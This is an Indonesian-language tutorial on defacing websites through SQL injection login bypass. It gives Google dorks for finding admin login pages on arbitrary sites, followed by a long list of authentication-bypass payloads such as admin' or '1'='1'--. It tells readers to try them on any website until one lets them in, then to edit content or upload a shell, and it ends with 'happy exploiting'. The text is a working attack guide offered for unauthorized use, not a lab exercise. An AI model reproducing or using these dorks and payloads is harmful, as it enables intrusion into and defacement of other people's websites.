Tutorial Cara Deface PoC Bypass Admin Login
Yo kembali lagi, disini kita akan belajar cara deface bypass admin, cara deface poc ini di butuhkan kesabaran :v. Okeh Langsung aja
Dork :
inurl:/admin.php intext:login intext:adminsitrator inurl:/admin/index.php intext:username inurl :/admin/Admin.php intext:login inurl:/administrator/login.php intext:username site:. inurl:/login.php intext:administrator intext:loginn
Payload :
' or 1=1 limit 1 -- -+ or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/*
Pilih salah satu website. Isi username dan password dengan salah satu payload di atas.
Jika vuln, maka akan masuk ke Control Panel / Admin Panel web tersebut.Jika login gagal coba gunakan payload yang lain siapa tau bisa masuk, tapi kalau udah di coba semua tidak berhasil coba cari web yang lain karna web itu tidah vuln. deface dengan poc ini membutuhkan kesabaran :v
Dan jika berhasil login, terserah kalian mau diapain :) .Bisa add/edit News atau mungkin kalo hoki nya bagus bisa upload shell :)
oke sekian pembahasan nya. happy exploiting.